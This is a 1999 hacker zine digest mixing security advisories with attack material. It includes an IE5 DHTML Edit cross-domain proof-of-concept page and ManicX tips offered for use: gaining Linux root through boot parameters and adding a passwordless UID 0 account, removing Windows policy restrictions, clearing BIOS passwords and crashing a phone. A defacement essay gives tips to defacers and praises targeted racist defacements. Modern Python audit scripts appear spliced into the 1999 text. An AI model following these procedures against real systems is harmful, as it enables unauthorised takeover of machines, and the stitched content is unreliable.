<p align="center"><font face="Arial"><img src="/cgi-bin/Count.cgi" width="97" height="24"><small><br>
</small><font size="1">Visitors since Mar 22, in the Year of Our Lord 1999</font></font></p>

<p><small>Last update Mar 24, in the Year of Our Lord 1999</small></p>
</body>
</html>

-------------------------------------------------------------------------------
http://pages.whowhere.com/computers/cuartangojc/dhtmle3.html

<html>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta name="keywords"
content="cuartango,dhtmle hole,dhtmle hole,IE5,IE 5 hole,IE 5,cuartango hole,cuartango,security,security site,security web,hack,security,risk,hole,security hole,explorer">
<title>DHTMLE vulnerabilities</title>
</head>

<body>
<script>
function fill()
{
dh.DOM.forms(0).T1.value="Don Juan Tenorio";
dh.DOM.forms(0).T2.value="Hosteria del Laurel";
dh.DOM.forms(0).T3.value="Barrio de Santa Cruz";
dh.DOM.forms(0).T4.value="Sevilla";
dh.DOM.forms(0).T5.value="Andalucia";
dh.DOM.forms(0).T6.value="Spain";
dh.DOM.forms(0).T7.value="424122225555";
window.setTimeout("SubmitForm()",1000);
}
function SubmitForm()
{
dh.DOM.forms(0).submit();
}
</script>


<h1 align="center"><small><font color="#FF0000">T<strong>he DHTML Editor cross-frame
hole</strong></font></small></h1>
<div align="left">

<table border="0" width="765" height="388">
<tr>
<td width="246" height="359" valign="top"> <p><small><font face="Arial">The box on the right
is a DHTML Edit Control Safe for scripting.<br>
It shows a form loaded from a <strong>different domain</strong> (<em>www.angelfire.com</em>).<br>
Click the button below and I will fill the form and submit it.</font></small></p>
<p align="center"><small><font face="Arial"><input type="button" value="Demo" name="B1"
onclick="fill()"></font></small></p>
<p><font face="Arial"><small>Don't worry about the message displayed. It is only a demo.</small><br>
<small><br>
</small></font></td>
<td width="511" height="359">
<object classid="clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A" width="497" height="318"
id="dh">
</object>
<script>
dh.LoadURL("http://www.angelfire.com/ab/juan123/dhtmle3form.html");
</script> </td>
</tr>
<tr>
<td width="757" height="21" colspan="2"><p align="center"><font face="Arial"
color="#FF0000"><strong><small>A malicious script inserted in a WEB page or in an HTML
formatted e-mail can submit transactions that will contain your IP address. (Imagine a
script writing menaces in the White House guest book)</small></strong></font>.<br>
</td>
</tr>
</table>
</div>

<p align="center"><a href="dhtmle1.html"><font face="Arial">Back to DTHMLE Vulnerabilities<br>
<br>
</font></a><font color="#400040">Created by</font> <a
href="mailto:cuartangojc@mx3.redestb.es">Juan Carlos Garcia Cuartango</a> </p>

<p align="center"><font face="Arial"><img src="/cgi-bin/Count.cgi" width="97" height="24"><small><br>
</small><font size="1">Visitors since March 22, in the Year of Our Lord 1999</font></font></p>

<p><small>Last update March 23, in the Year of Our Lord 1999</small></p>

<p> </p>
</body>
</html>

-------------------------------------------------------------------------------

Date: Thu, 25 Mar 1999 10:06:01 -0800
From: Harry Goodwin <harryg@MICROSOFT.COM>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Re: IE 5 security vulnerabilities

I wanted to take a moment to thank Juan Carlos for bringing these issues to
Microsoft's attention prior to posting the issues publicly. I also wanted
to post Microsoft's response to the issues he's discovered.

1) Internet Explorer has customizable security settings in
place for users who are concerned about allowing certain functionality. In
this particular case, concerned users can easily block this behavior by
checking either 'disable' or 'prompt' under "Allow paste operations via
script" in the custom settings section in security zones. Using the IEAK, admins
can also adjust the default setting for this option before distributing
Internet Explorer to their users. The option is set to 'enable' by default
to allow enhanced functionality.

2) Upon investigation we did find a cross domain security
violation in the DHTML edit control which we will revoke, fix, and release.

3) Internet Explorer has a mechanism in place which allows
Microsoft to release a .reg file to block ActiveX controls by changing a
bit in the registry.

4) The following information found on MSDN (search on
CodeBaseSearchPath) addresses this concern: When Internet Component
Download is called to download code, it traverses the Internet search path
to look for the desired component. This path is a list of object store servers
that will be queried every time components are downloaded using
CoGetClassObjectFromURL. This way, even if an <OBJECT> tag in an HTML
document does not specify a CODEBASE location to download code for an
embedded OLE control, the Internet Component Download will still use the
Internet search path to find the necessary code.

Internet search path syntax

The search path is specified in a string in the registry, under the key
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CodeBaseSearchPath.
The value for this key is a string in the following format:

CodeBaseSearchPath = <URL1>; <URL2>; ... <URLm>; CODEBASE; <URLm+1>; ... <URLn-1>; <URLn>

In this format, each of URL1 through URLn is an absolute URL
pointing to HTTP servers acting as "object stores". When processing a
call to CoGetClassObjectFromURL, the Internet Component Download service
will first try downloading the desired code from the locations URL1 through
URLm, then try the location specified in the szCodeURL parameter
(corresponding to the CODEBASE attribute in the <OBJECT> tag), and will
finally try the locations specified in locations URLm+1 through URLn.
Note that if the CODEBASE keyword is not included in the key,
calls to CoGetClassObjectFromURL will never check the szCodeURL location for
downloading code. By removing the CODEBASE keyword from the key,
corporate intranet administrators can effectively disable Internet Component
Download for corporate users.

Thanks, Harry

-------------------------------------------------------------------------------

Date: Thu, 25 Mar 1999 14:57:51 -0500
From: Phil Brass <pbrass@ISS.NET>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Re: IE 5 security vulnerabilities


> 4) The following information found on MSDN (search on
> CodeBaseSearchPath) addresses this concern: When Internet Component
> Download is called to download code, it traverses the Internet search path
> to look for the desired component. This path is a list of object store servers
> that will be queried every time components are downloaded using
> CoGetClassObjectFromURL. This way, even if an <OBJECT> tag in an HTML
> document does not specify a CODEBASE location to download code for an
> embedded OLE control, the Internet Component Download will still use the
> Internet search path to find the necessary code.
> Internet search path syntax
> The search path is specified in a string in the registry, under the key
> HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CodeBaseSearchPath.
> The value for this key is a string in the following format:
> CodeBaseSearchPath = <URL1>; <URL2>; ... <URLm>; CODEBASE; <URLm+1>; ... <URLn-1>; <URLn>

On my NT4 SP3 box, permissions on this key are set to Everyone: Special
Access, which includes set value. Therefore, anyone who is a user on this
box can control where every other user downloads their controls from.
Is that OK?

Phil
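An added example, not code from either post nor from Microsoft, that works through the MSDN format Harry quotes, Cuartango's question 4 and the concern Phil raises: it parses a CodeBaseSearchPath string, reproduces the lookup order for a given OBJECT CODEBASE, and flags object stores outside an allow-list, which is the check an administrator would run against a key that other users can write. All URL values and host names are constructed.

```python
"""Interpret an Internet Component Download CodeBaseSearchPath value.
Added example with constructed sample values; it models the lookup order the
MSDN text above describes and audits the object stores listed in the key."""
from typing import List, NamedTuple, Optional
from urllib.parse import urlsplit


class SearchPath(NamedTuple):
    before_codebase: List[str]   # URL1 .. URLm, tried before the OBJECT tag's CODEBASE
    has_codebase: bool           # whether the CODEBASE keyword appears at all
    after_codebase: List[str]    # URLm+1 .. URLn, tried last


def parse_search_path(value: str) -> SearchPath:
    """Split the semicolon-separated value; 'CODEBASE' is a keyword, not a URL."""
    before: List[str] = []
    after: List[str] = []
    seen_codebase = False
    for entry in (e.strip() for e in value.split(";")):
        if not entry:
            continue
        if entry.upper() == "CODEBASE":
            seen_codebase = True
            continue
        (after if seen_codebase else before).append(entry)
    return SearchPath(before, seen_codebase, after)


def resolution_order(path: SearchPath, sz_code_url: Optional[str]) -> List[str]:
    """Locations CoGetClassObjectFromURL would try, in order, for one OBJECT tag.
    sz_code_url is the tag's CODEBASE attribute (None when the tag has none),
    which is consulted only if the CODEBASE keyword is present in the key."""
    order = list(path.before_codebase)
    if path.has_codebase and sz_code_url:
        order.append(sz_code_url)
    order.extend(path.after_codebase)
    return order


def audit_search_path(value: str, trusted_hosts: List[str]) -> List[str]:
    """Findings an administrator would want: download disabled, or stores off the allow-list."""
    path = parse_search_path(value)
    findings: List[str] = []
    if not path.has_codebase:
        findings.append("CODEBASE keyword absent: OBJECT CODEBASE attributes are never consulted")
    for url in path.before_codebase + path.after_codebase:
        host = (urlsplit(url).hostname or "").lower()
        if not any(host == t or host.endswith("." + t) for t in trusted_hosts):
            # A store that precedes CODEBASE wins over the page's own CODEBASE for
            # every user on the box, so an unexpected entry here matters.
            findings.append(f"object store outside allow-list: {url}")
    return findings


# Constructed samples: an expected value and one where a foreign store was prepended.
EXPECTED_VALUE = "CODEBASE;http://activex.example-vendor.test/ocget.dll"
TAMPERED_VALUE = "http://objects.rogue-store.test/store;" + EXPECTED_VALUE
TRUSTED_HOSTS = ["example-vendor.test"]

if __name__ == "__main__":
    tag_codebase = "http://pages.example.test/dhtmed.cab"
    print(resolution_order(parse_search_path(TAMPERED_VALUE), tag_codebase))
    print(audit_search_path(TAMPERED_VALUE, TRUSTED_HOSTS))
```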


@HWA

07.0 QuickHacks and tips from ManicX
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Quick Tricks

Now Just a few quick tips
( pulled all the other stuff, its for your own good :þ )
Stuff Covered - Linux, Mobiles, Windows, BIOS,


System: Nokia 5110

Crash it
Send an SMS message full of 160 full stops to the phone
It will now beep and flash for 30 seconds or else just turn itself off


System: Linux (with lilo installed and local access)

Gives a root shell / root account
reboot your machine and at the lilo: prompt type in
what-linux-is-called-in-/etc/lilo.conf init=/bin/bash rw

(i.e. linux init=/bin/bash rw )

linux will now start to boot and stop after a few error messages
you now have a root shell (you will have very few commands) so
type in the following

cat >> /etc/passwd
manicx::0:0:new root account:/root:/bin/bash
(hit ctrl+d to get out of cat)

sync (just to bring your files up to date)

reboot and login with your new root account called manicx (no password)


System: Linux (with local access)

Gives a root shell / root account
Boot with the rescue.img available on most linux distro cd's
voila one root shell you will probably have to mount your linux
partition (hda5 is the partition might be hda2 > hda7)

mkdir /linux
mount /dev/hda5 /linux
cat >> /linux/etc/passwd
manicx::0:0:new root account:/root:/bin/bash
(hit ctrl+d to get out of cat)

sync (just to bring your files up to date)

reboot and login with your new root account called manicx (no password)
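A defender's counterpart to the two Linux tips above, added here as an example and not part of ManicX's tips: this Python script parses a constructed /etc/passwd (or the passwd file of a mounted partition) and flags exactly the artifact those procedures leave behind, a second UID 0 account with an empty password field.

```python
"""Audit a passwd(5) file for the traces a root-account insertion leaves:
an extra UID 0 entry and an empty password field. Added example; the
sample file below is constructed."""
from typing import List, NamedTuple


class PasswdEntry(NamedTuple):
    name: str
    passwd: str   # "x" or "*" when the hash lives in /etc/shadow; "" means no password
    uid: int
    gid: int
    gecos: str
    home: str
    shell: str


def parse_passwd(text: str) -> List[PasswdEntry]:
    """Parse passwd lines; malformed lines raise rather than being skipped silently."""
    entries: List[PasswdEntry] = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"line {lineno}: expected 7 colon-separated fields, got {len(fields)}")
        name, passwd, uid, gid, gecos, home, shell = fields
        entries.append(PasswdEntry(name, passwd, int(uid), int(gid), gecos, home, shell))
    return entries


def audit_passwd(text: str, expected_root: str = "root") -> List[str]:
    """Return human-readable findings; an empty list means nothing suspicious."""
    findings: List[str] = []
    seen_names = set()
    for e in parse_passwd(text):
        if e.name in seen_names:
            findings.append(f"duplicate account name: {e.name}")
        seen_names.add(e.name)
        if e.uid == 0 and e.name != expected_root:
            # Any second UID 0 entry is root under another name.
            findings.append(f"extra UID 0 account: {e.name} (shell {e.shell})")
        if e.passwd == "":
            # Empty second field: login succeeds with no password at all.
            findings.append(f"empty password field: {e.name}")
    return findings


# Constructed sample: a normal shadow-style passwd file plus the line the tips above append.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
manicx::0:0:new root account:/root:/bin/bash
"""

if __name__ == "__main__":
    for finding in audit_passwd(SAMPLE_PASSWD):
        print(finding)
```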


System: Windows

Remove All policy restrictions

Open regedit
Scroll down to :
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies

Anything with a value of "1" is turned ON so double click on it
and change the value to "0" to turn it OFF
(Or if you can't be arsed just delete them. It's best to
note changes and change them back when you're finished)

When you're finished just exit; you should now have access to
all the restricted commands (run/dosprompt/control_panel/etc)

(Win98- You will probably have to reboot before the changes take effect)


System: Windows 95

Close down the start menu :þ
Double click the [Start] button, so it's got a black dotted line
on it (this means it's got focus), hit alt and - (minus key) at the
same time, voila, you can now move or close the start menu


System: Windows

Gets rid of BIOS password (and resets CMOS settings)
killcmos.zip
Or Pull out the cmos battery for 5-10 mins (you need to know the setup)


System: Windows

Get past any password protection before boot-up
Try booting from a floppy or holding down the shift key during startup


@HWA

08.0 NT4 index server 2.0 vulnerabilities
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Tue, 23 Mar 1999 23:40:55 -0000
From: Mnemonix <mnemonix@GLOBALNET.CO.UK>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Index Server 2.0 and the Registry


When Microsoft's Index Server 2.0 is installed on NT 4 with
Internet Information Server 4 it opens a new "AllowedPath"
into the Windows NT Registry.

Administrators can control who can access the Windows NT
Registry via the network by editing permissions on the
Winreg key found under

HKLM\SYSTEM\CurrentControlSet\Control\SecurePipeServers\Winreg

By default, on NT Server 4, the permissions on this key are
set to Administrators with Full Control. No-one else should
have access (although it doesn't really work out like this in
the end.) There are certain paths through the Registry that
remote users, whether they are Administrators or not, may
access. These are listed in the AllowedPaths subkey found
under the Winreg key. These paths are to allow basic network
operations such as printing etc to continue as normal.

Index Server 2.0 creates a new "AllowedPath":

HKLM\System\CurrentControlset\Control\ContentIndex\Catalogs

meaning that anyone with a local or domain account for that
machine, including Guests, is able to discover the physical
path to directories being indexed or, if a directory found in a
network share is being indexed, they can learn the name of the
machine on which the share resides and the name of the user
account used to access that share on behalf of Index and
Internet Information Server. Permissions on the above key and
its sub-key give Everyone read access.

Note that regedit and regedt32 can not be used to access this
information. Tools such as reg.exe or home-baked efforts must
be used.

In most cases this issue represents a mild risk, but one worth
noting and resolving by removing if this adversely affects you
and your security policy.

Cheers,
David Litchfield
http://www.infowar.co.uk/mnemonix/


@HWA

09.0 Yahoo news ticker has plaintext passwords in config files...
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

FOR IMMEDIATE RELEASE:

Application: Yahoo! NEWS TICKER
Platforms : Win95,98,NT

Advisory:

The installation process of the Yahoo! NEWS TICKER
leaves a file named "install.log" in the program
directory. The file contains the plaintext userid and
password.

The installation process also sets registry entries
under hkey_local_machine/software/netcontrols/ticker
that contain the plaintext userID and password.


Each yahoo account uses the same password/userid for
all parts including auctions, news, my.yahoo,
classifieds, and most importantly, EMAIL!!!!

This is an independent finding, not a release by Yahoo!.

Advisory by CSB 24MARCH99

<end of transmission>

@HWA

10.0 Defacing websites? read this from bufferoverflow/attrition.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

# mv index.new index.html
# echo "03.20.99"
# echo "I do not advocate web defacement or intrusive hacking."

Introduction
The Ends Justify The Means.
My Rant In Plain English.
Justification
Suggestions For Improving Your Hacked Pages.
The Good, The Bad, and The Impressive.


Introduction

Browsing the web, enjoying your time, nothing better to do. Casual search
for something interesting to read, or maybe even a little research for a
project or term paper. Click here, click there, link from site to site.
Some mostly worthless, nothing more than links to other pages. Same old
thing, different day.. until today. You typed in the URL for a web page
that promised to have your info. Instead of computer pricing or biology,
you found a cryptic message scrawled out claiming something, hell if you
could tell what it was. You click on and forget about it.

Yes, that was a hacked web page. One of the favored things of crackers to
boast their deeds. Proof that they alone control the universe and 'own'
someone else's computers. Self reasoning and a shoddy moral vindication
of a petty break-in to some no name computer. At least, that sums up
almost 99% of current web defacement activities. Why?


The Ends Justify The Means.

Ok, lets buy that argument for now. The 'means' in our case is the hacking
of a site and the 'ends' constitutes replacement of the existing web page
with a new 'improved' page carrying the hacker's message. In today's
digital world, it is the equivalent of spray painting a wall to have your
message seen by passersby. Stop here and think about all of the spraypaint
graffiti you have seen in the last six months. How much can you remember?
Odd isn't it. Some person took the time and effort to break the law in
order to get their message out. Risk possible incarceration for words or
ideas they felt were important, yet you can't remember any (or all) of
it. Why?

Simple answer. Because there was no real message worth reading. After
taking the power of free speech into their hands, after finding a place to
stand on a soapbox, the person stood up only to mumble to a handful of
faithful followers that already know the message. And boy, do they love to
hear you talk! The rest of the passersby continue on, unconcerned. They
still don't know what you are trying to say. In fact, their opinion of you
has gone down because you took the time to get a soapbox, stand on it, and
face the public. You flaked out and didn't broadcast a meaningful message,
therefore you are worth no time or thought. And there you go, a passing
inattention in a fast moving world. Congrats.


My Rant in Plain English

In the past few years, over one thousand web pages have been hacked.
Their content has been replaced with whatever hasty rant has popped into
mind by the cracker. With few exceptions, arbitrary low traffic and no
name domains are 'chosen' by these crackers to put up their message. Some
of these sites get more traffic from the hack than a previous month of
regular visitors they are so low key.

The truth is, these kids(1) have delusions of grandeur in a networked
world that could give a second thought about them. Their message is
meaningless drivel that only impresses other kids for the most part. Web
viewers walk away from seeing their "message" thinking immature social
rejects plague the net, and they think so for damn good reasons.

More and more sites are being replaced by poorly designed pages, chock
full of misspelled words forming sentences that defy all rules of grammar.
Pages full of "elite speak"(2) that prove absolutely nothing, have no
humor value, and only contribute to more eye strain. Pages containing
poorly written rants that form incoherent thoughts, opinions or reasons as
to why the page was altered in the first place. Basically, dull pages that
show a complete lack of intelligence and no creativity whatsoever.

These kids have a chance to show the world that they are indeed
intelligent well balanced *mature* net users, yet they throw every chance
away it seems.

(1) I use the word kids because more times than not, they ARE
kids. Fifteen to Eighteen year olds that don't quite have
a concept of how things work. In the cases where they are
over eighteen, it is often difficult to tell based on the
content of the altered pages. Don't like the use of the
word 'kid'? Do a better job hacking these pages.
(2) Elite speak being the oh-so-old replacement of alternate
characters to spell words. t|-|1s TyP3 0f +3xt.


Justification

It seems most hackers want/need to justify their actions, be it to the
admin of the site they broke into, the people reading the pages, their
friends or often times themselves. Regardless of who they are trying to
vindicate themselves to, the reasoning falls apart every time.

Justification #1: "I'm doing you a favor.. this could have been a
malicious hacker that damaged your system!"
. Gee thanks for breaking in to
tell me that. It didn't occur to you that the other 80 MILLION internet
users did me a favor by not breaking in? Yet I should thank you? Although
these kids rarely do damage, they cause the administrator extra grief in
one form or another. Rather than normal work, they are forced into doing a
full security audit of their system or reinstalling from scratch. Yes,
maybe they should have been more concerned with security before this, but
it is a rare site that can dedicate that kind of time or resource to
staying up to date on the bleeding edge. That is the way the world works,
so deal with it. Oh, and don't try to use that as a justification.

Justification #2: "Because we can!" Ok, so if I shoot you in the
knee 'just because I can', does that teach you any real lesson? Amazingly
enough, this is about the only justification that holds any water. If
nothing else, it is the brutally honest truth that the person had nothing
better to do, and had no well grounded reason for their actions. Instead
of using this as a justification, why not think of a truly noble cause and
follow it?

Justification #3: "I was pointing out security holes on your site!"
Gee, thanks for the free security audit. Not. While you did indeed prove
there was a hole, did you mail the administrator telling him HOW you broke
in? How to fix it? Did you find more than one way into the system or just
the one? If you did none of that, you weren't even close to performing a
security audit. Oh, audits require permission too. Bad reason.

Justification #4: "Read my political reasons yo!" This one almost
works for me, but like the others has serious shortcomings. If your true
reason is to impress upon your readers of some political or moral agenda,
did you really do it? A good job of it? Did you sit down and research your
topic, finding resources and legitimate sources of information to leak to?
Did you write up a political rant and place it on an appropriate system?
Did you spell check your work to make sure that it flowed reasonably well?
Doubtful. Putting up third grade level rants on www.unrelated.com mean
just about nothing and truly fail as a justification. Try again.


Suggestions For Improving Your Hacked Pages.

I am not one to complain about a problem without offering some solution or
input to offset the bitching. However, with this comes the chance people
will blame me for encouraging hacking and continued defacement of web
pages. I do NOT condone any such thing! I am practical and realize
that nothing I say will stop people from doing it. That in mind, I am just
trying to make the best out of an existing situation. That said... here
are my top 10 suggestions for future hacked pages.

1. Better designed pages! Hackers and crackers are said to be
creative. You sure wouldn't know it looking at many of these
pages. Take your time and DESIGN the web page you are putting
up. Make it aesthetically appealing to both lynx and graphical
browsers. Why do companies spend all the time on beautiful
pages in the first place?

2. Better messages! You are cracking these machines and
replacing pages to "get your message out". Err, ok, what is your
message? Remember that people are visiting with no prior
knowledge of you, your message, or your cause. Be clear and
concise and spell out your message for them.

3. No more elite speak crap. If you want to impress people
with alternate characters, offer the hacked page in several
languages. I for one would love to know what some of the hacked
pages in Mexico say, and I would also bet that foreign hackers
would love to read American hacks in their tongue. Surely you know
someone who can translate to German, French, Latin, Russian
or more impressive, Japanese. :)

4. You want to use 'elite' speak? Try grammar, spelling, and
punctuation. A well written paragraph will command more respect
than any substitute character will. If you misspell common
words, how can anyone take you seriously? Do you find yourself
falling behind in English classes? Use the net to help you!
You may find online resources like a dictionary or thesaurus
an invaluable tool.

5. Help the site! After all, you embarrassed them and caused
them some kind of hassle. After breaking in and changing their web
page, why not temporarily patch the hole/bug in the system
that gave you access? Better, patch it and tell what you exploited
to get in on the web page. Let other admins learn that these
holes are actively being exploited. Link to information on more
permanent solutions to their security problem. That is at least
half way noble.

6. Back up the main page for them! Rather than overwriting
their index.html and relying on them to have a copy, just rename
the old one. From your new page, link to the old one and give
customers a chance to reach the information they were looking
for. They had to read your message to get to it, your job is
done.

7. Show knowledge of computers! Creating your hacked web pages
with editors like 'FrontPage Express' isn't exactly conducive
to propagating the myth that hackers know the system. If you
can't write out a basic web page in a simple editor like 'vi',
'pico', or 'DOS edit', you should probably learn HTML before
worrying about other people's systems.

8. Target your hacks! Don't change the page of any arbitrary
domain you happen to stumble across. Pick a system you feel
that needs a face lift and apply it to that system only.

9. Don't actually carry out the mass hack! If you find
yourself in the position of being able to change pages on multiple
domains, don't. Just pick the highest traffic domain, or biggest
name and change that one. On your hacked page link to a list of
other domains that could have been affected.

10. Choosing a name! Try to be mature when choosing a name.
Everyone realizes that some names are quite humorous, but remember
who reads these pages. Making a profound statement and backing
it by "tHe SiNgAlOnG gAnG!@$#$@" just isn't very cool.


The Good, The Bad, and The Impressive.

In the past, there have been pages (more like *elements* of pages) that
have stood out as creative, amusing, or to the point. Hopefully by
pointing out these examples you will begin to see what I have been
attempting to convey.

The Good

Humor: While it probably wasn't the best site to hit, the recent
hack of Greenpeace had a certain dark (and sick) sense of
humor behind it.

Interesting: Another new person/group to hit the scene recently is
'Redemption'. Their hacks to date have simply contained
(apparent) original poetry. A sign of creativity at last!
You can read their work from hacks like DaytonTech,
Town Green, and TC Edge.

Targeted: As suggested above, targeting specific domains in order to
spread a specific message is a good thing. Examples of this
can be found in Monica Lewinsky's Future Site, White Pride,
and Ku Klux Klan.

Political: Probably the most memorable and well done hacks was that of
the 'Human Rights China' site. When hacking for political
agendas, hit the right site, with the right message, and
present a well written argument. Does wonders. Don't believe
me? Check out the www.humanrights-china.org hack.

The Bad

Bad: Amnesty International found themselves victim of a web
page defacement. Of all the sites on the net, why hit
groups that are trying to do good already? Isn't that
somewhat defeating?

Pathetic: The various hacks for a short period of time carried out
by 'zyklon' of LoU. These hacks (many movie home pages)
turned out to be one or two lines of broken English followed
by a dedication to his girlfriend. *yawn* Kiddies with
no creativity.

Pathetic: The recent mass hack by the 'Miss Piggy Hackclub', which
caused over one hundred domains to display a single line:
"The Miss Piggy Hackclub Strikes again muthafuqErz!$##$!@"
*yawn* That is almost worth reading.

The Impressive

None! There hasn't been a truly impressive web page defacement to come
along. None that took the cake in site, message, and design. :(


by whoever (whoever@attrition.org)
(c)opyright 1999 - This piece protected by U.S. copyright and may not
be copied without the express written permission of
'whoever@attrition.org'
or representing parties of said address. Permission is granted to repost
this work in full on any *non-profit* site or mail list.

Disclaimer: I do not advocate web defacement. Don't do it. Go learn to
program or be creative in better capacities.

-EOF


@HWA

11.0 Security analysis of Satellite command uplinks
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Security Analysis of Satellite
Command and Control Uplinks

By Brian Oblivion, L0pht Heavy Industries
mailto:oblivion@l0pht.com


With every passing day we are becoming aware of the
fragile link between technology and modern society. Many
critical information paths flow over satellites orbiting our
earth. A box floating in space seems to be a likely target
for hacker groups or renegade nation-states. As
sensational as such a satellite takeover would be, it is
highly unlikely. These satellites cost millions of dollars, and
an adequate sum of money is devoted to make sure it
remains under the control of the intended parties.

This document attempts to perform an analysis of security
methods used by Government/Military Ground Stations.
This information is a summation and review of open-source
non-classified information taken from the Internet and
other printed sources. Most information is from NASA
operations procedures; however, references from those
procedures influence/are influenced by military SATCOM
standard operating procedures.

There are two methods of compromising a satellite by an
external threat vector.* One is an attack directly on the
Satellite by a rogue Ground Station. The second is an
attack on the Master Ground Station (MGS), which houses
the command and control (C&C) Uplink, and various
access control equipment. An outside attacker may not
have all the resources necessary to attack the C&C uplink,
such as the equipment that encodes the commands and
the transmission to the spacecraft. This driving factor
makes the assault on the MGS all the more appealing.

A great deal of work has been put into securing the C&C
Uplink. The spacecraft command processor authenticates
every command sent to it. The C&C data is often
encrypted and decrypted in the spacecraft. The downlink
is often unencrypted, however, in the military arena, this
is often encrypted as well. Various transmission modes
can be used but in the military/government arena spread
spectrum (SS) or frequency hopping (FH) is generally
employed using secure spreading or hopping sequences.
SS and FH are used due to their anti-jamming and low
probability of intercept characteristics.

In the unlikely event a rogue Ground Station actually
acquired the sequence to get a command burst to the
satellite, the MGS would begin to receive telemetry
indicating that a command channel is being accessed.
Responses from the satellite to the rogue Ground Station
would be received at both locations. The MGS would see a
response to a request it did not send and a flag would be
raised at which point contingency plans would be set in
motion. It would also be very difficult for a rogue Ground
Station to supply the proper command sequence field,
unless the MGS is being monitored. Highly unlikely in the
case of the armchair hacker, point and clicking his way to
telecommunications Godhood.

By far the path of least resistance is obtaining control
through compromising the security of the MGS. While long
term control may not be achievable, there is the
possibility of spoofing a command message to the uplink
operators and having them pass that information to the
satellite. Scientific Exploration and commercial satellites
usually conform to the CCSDS telecommand frames and
the military/government uses something similar.
Information on these command frames and command
syntax are available through the Internet.

A set of checks and balances exist within the MGS. If a
command request exceeds pre-defined parameters, the
command is flagged and escalated to an authority to
determine the nature of the exception. Interception,
modification, and re-submission of a command message is
of the greatest risk. However, the attacker would require
an in-depth knowledge of the target system and have
knowledge of the normal operational parameters so
exceptions would not be flagged, revealing his presence.
Once a command is determined valid by the spacecraft
command processor, the command is sent back to verify
the proper command was indeed received and awaits
acknowledgement. Further analysis of the command
processor and actual checks performed on the sequence
and syntax of commands received are beyond the scope
of this document.

Due to these checks, one command sending the satellite
spiraling out of orbit is just not possible without the
addition of catastrophic equipment failure. Remember that
satellite position is also tracked by third parties. In the
event that a satellite makes a change in course, the MGS
of that satellite would be immediately notified. There are
other checks in place that monitor the heartbeat of a
satellite. Should that satellite move, its associated beam
spot would become disturbed resulting in loss or
degradation of communications.

There are overrides to the normal safeguards for
emergency spacecraft commanding. As long as an override
provision exists, there is the possibility of the exploitation
of that provision. However, the override can only be
engaged by onsite MGS personnel. Manual overrides are a
requirement for every MGS. In the event that the
computerized frontend is compromised in some fashion, be
it of malicious intent or equipment failure, commands can
be relayed to the spacecraft directly from manual
command consoles.

The nature of Satellite communications often dictates
that Ground Stations are not necessarily located in the
most convenient locations. Quite often they are located in
remote regions and/or at sea. This requires a distributed
networking architecture as well as interoperability
definitions. NASA in particular has been moving from its
highly proprietary legacy systems to more
commercial-off-the shelf (COTS) hardware. One must
realize this obscurity once provided additional security to
the network. The current trend in commercial security
offerings is a reactionary role to security management.
Holes remain to be identified until the units are shipped to
the end user and often not found until the device is in
operation.

Some MGS's are known to be connected to live
internetworked nets. These nets are often treated as
sensitive, yet unclassified, to support interoperability.
Security policy governing the nature of the systems which
are hosted by the satellites define the security of the
MGS network. Where interoperability is not an issue,
without physical access to the MGS, your chances are
remote to compromise the system.

Institutional security policy sets directives in employing
firewalls and restrictive routers. Intrusion detection
systems may also be employed between closed networks.
SecurID, Kerberos, and biometric access controls are
found throughout the commercial/government/military
access controls. Access is usually restricted by IP
address. Firewalls and routers have been known to be
accidentally misconfigured, and often remain that way for
lengthy periods of time due to inadequate penetration
testing and security fault analysis. An offline
proof-of-concept security prototyping lab is a requirement
for integrating a new access control system into the
operational environment. A good institutional security
policy will require such facilities.

Many safeguards have been built into the existing C&C
uplinks. Key management systems are classified, as is
information on implementation of cryptographic systems
used. There may be holes in the implementation, but with
the other safeguards, the chances of successfully
undermining the security mechanisms are slim. One can
never underestimate the human factor in these systems.
To poke holes in security policy is human.

Hopefully this article shed light onto the criteria which
may lead to MGS compromise and direct satellite C&C
uplink attack. The chances of something along these lines
actually happening without new techniques or heretofore
unknown methods being employed, is remote, but not
impossible.

----------------------------------------------------

* A third attack vector could be an attack from within.
Poisoning the flight software on the satellite, or the
software used to interact with the satellite, bypassing
required security provisions.

Code review could diminish this threat.


@HWA


12.0 Melissa virus makes it hard for Microsoft users
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
Bad Girl Melissa Overloads Networks


Contributed by Adam
IT Managers around the world will wake up Monday
morning to overloaded email servers as a new MS Word
Macro Virus/Worm spreads across the internet. "Melissa"
attacks users of MS Outlook by grabbing up to fifty
addresses from an Outlook address book and
automatically sends copies of itself as an MS Word
attachment to unsuspecting victims. While the
virus/worm does not seem to intentionally cause
damage the flood of email that it generates is enough to
bog down servers essentially causing a major denial of
service. Users who do not use Microsoft products will
not be affected.

Forbes.........http://www.forbes.com/tool/html/99/mar/0326/side1.htm
ZD Net.........http://www.zdnet.com/zdnn/stories/news/0,4586,2233030,00.html
Info World.....http://www.infoworld.com/cgi-bin/displayStory.pl?990326.wcvirus.htm
NY Times.......http://www.nytimes.com/library/tech/99/03/biztech/articles/28virus.html
C | Net........http://www.news.com/News/Item/0,4,34334,00.html?st.ne.fd.gif.e
